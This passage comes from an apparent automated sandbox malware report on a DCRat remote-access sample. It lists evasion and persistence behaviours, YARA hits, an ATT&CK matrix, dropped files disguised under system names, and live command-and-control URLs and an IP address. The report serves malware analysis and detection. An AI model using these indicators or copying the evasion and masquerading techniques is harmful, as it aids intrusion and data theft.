            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe TID: 5768Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 7316Thread sleep count: 367 > 30
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 7176Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 7180Thread sleep count: 366 > 30
            Source: C:\Users\Public\AccountPictures\Registry.exe TID: 5064Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 7376Thread sleep count: 367 > 30
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 1472Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 7408Thread sleep count: 173 > 30
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 7408Thread sleep count: 200 > 30
            Source: C:\Users\user\StartMenuExperienceHost.exe TID: 360Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7368Thread sleep count: 366 > 30
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7252Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7388Thread sleep count: 369 > 30
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe TID: 7248Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Public\AccountPictures\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599687Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599578Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599468Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 599359Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\AccountPictures\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeThread delayed: delay time: 922337203685477
            Source: oFAjWuoHBq.exe, 00000000.00000002.2054737738.000000001BE28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\6
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2104816265.000000001BFAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess token adjusted: Debug
            Source: C:\Users\Public\AccountPictures\Registry.exeProcess token adjusted: Debug
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess token adjusted: Debug
            Source: C:\Users\user\StartMenuExperienceHost.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeProcess created: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe "C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe" Jump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeQueries volume information: C:\Users\user\Desktop\oFAjWuoHBq.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeQueries volume information: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exeQueries volume information: C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\AccountPictures\Registry.exeQueries volume information: C:\Users\Public\AccountPictures\Registry.exe VolumeInformation
            Source: C:\Users\Public\AccountPictures\Registry.exeQueries volume information: C:\Users\Public\AccountPictures\Registry.exe VolumeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeQueries volume information: C:\Users\user\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Users\user\StartMenuExperienceHost.exeQueries volume information: C:\Users\user\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe VolumeInformation
            Source: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeQueries volume information: C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe VolumeInformation
            Source: C:\Users\user\Desktop\oFAjWuoHBq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2084176737.000000000127B000.00000004.00000020.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2104816265.000000001BFAA000.00000004.00000020.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2084176737.00000000012F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2148302161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2148302161.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.2143381456.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2132989514.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2152498750.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2140699573.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.2153356357.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2085969443.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2151848592.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: oFAjWuoHBq.exe PID: 1372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 3168, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 7152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 6128, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Registry.exe PID: 5612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Registry.exe PID: 6544, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 5752, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 5436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 6596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 2272, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2152498750.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2148234479.000000000334D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.2148234479.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2148302161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2148302161.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.2143381456.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2132989514.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2152498750.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2140699573.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.2153356357.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2085969443.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2151848592.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: oFAjWuoHBq.exe PID: 1372, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 3168, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 7152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 6128, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Registry.exe PID: 5612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Registry.exe PID: 6544, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 5752, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 5436, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 6596, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe PID: 2272, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		213
            Masquerading            		OS Credential Dumping241
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		151
            Virtualization/Sandbox Evasion            		Security Account Manager151
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture12
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials34
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581832 Sample: oFAjWuoHBq.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 100 36 ilusharx.beget.tech 2->36 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Antivirus detection for URL or domain 2->42 44 12 other signatures 2->44 7 oFAjWuoHBq.exe 1 19 2->7         started        11 Registry.exe 2->11         started        13 StartMenuExperienceHost.exe 2->13         started        15 6 other processes 2->15 signatures3 process4 file5 26 C:\Users\user\StartMenuExperienceHost.exe, PE32 7->26 dropped 28 C:\Users\Public\...\Registry.exe, PE32 7->28 dropped 30 C:\Program Files\...\ctfmon.exe, PE32 7->30 dropped 32 8 other malicious files 7->32 dropped 46 Drops PE files to the user root directory 7->46 48 Uses schtasks.exe or at.exe to add and modify task schedules 7->48 50 Creates processes via WMI 7->50 52 Drops executable to a common third party application directory 7->52 17 tcEcURjxxClvKHXzINDGbUbctpEdgO.exe 14 3 7->17         started        20 schtasks.exe 7->20         started        22 schtasks.exe 7->22         started        24 13 other processes 7->24 54 Antivirus detection for dropped file 11->54 56 Multi AV Scanner detection for dropped file 11->56 58 Machine Learning detection for dropped file 11->58 signatures6 process7 dnsIp8 34 ilusharx.beget.tech 5.101.152.15, 49704, 80 BEGET-ASRU Russian Federation 17->34

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            oFAjWuoHBq.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            oFAjWuoHBq.exe76%VirustotalBrowse
            oFAjWuoHBq.exe100%AviraHEUR/AGEN.1323944
            oFAjWuoHBq.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\AccountPictures\Registry.exe100%AviraHEUR/AGEN.1323944
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe100%AviraHEUR/AGEN.1323944
            C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe100%AviraHEUR/AGEN.1323944
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe100%AviraHEUR/AGEN.1323944
            C:\Users\user\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323944
            C:\Users\Public\AccountPictures\Registry.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe100%Joe Sandbox ML
            C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe100%Joe Sandbox ML
            C:\Users\user\StartMenuExperienceHost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Public\AccountPictures\Registry.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\user\StartMenuExperienceHost.exe79%ReversingLabsByteCode-MSIL.Ransomware.Prometheus

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://ilusharx.beget.tech/100%Avira URL Cloudmalware
            http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs100%Avira URL Cloudmalware
            http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38100%Avira URL Cloudmalware
            http://ilusharx.beget.tech100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ilusharx.beget.tech
            		5.101.152.15
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCstrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://ilusharx.beget.tech/L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i38tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameoFAjWuoHBq.exe, 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003222000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://ilusharx.beget.tech/tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003219000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmp, tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2088975523.00000000137A8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://ilusharx.beget.techtcEcURjxxClvKHXzINDGbUbctpEdgO.exe, 00000011.00000002.2085969443.0000000003250000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                5.101.152.15
                		ilusharx.beget.techRussian Federation
                		198610BEGET-ASRUtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1581832
                Start date and time:2024-12-29 03:36:07 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 32s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:28
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:oFAjWuoHBq.exe
                renamed because original name is a hash value
                Original Sample Name:97177514cab51539083ef130f005bbd1.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@26/20@1/1
                EGA Information:Failed
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target Registry.exe, PID 5612 because it is empty
                • Execution Graph export aborted for target Registry.exe, PID 6544 because it is empty
                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5436 because it is empty
                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5752 because it is empty
                • Execution Graph export aborted for target ctfmon.exe, PID 6128 because it is empty
                • Execution Graph export aborted for target ctfmon.exe, PID 7152 because it is empty
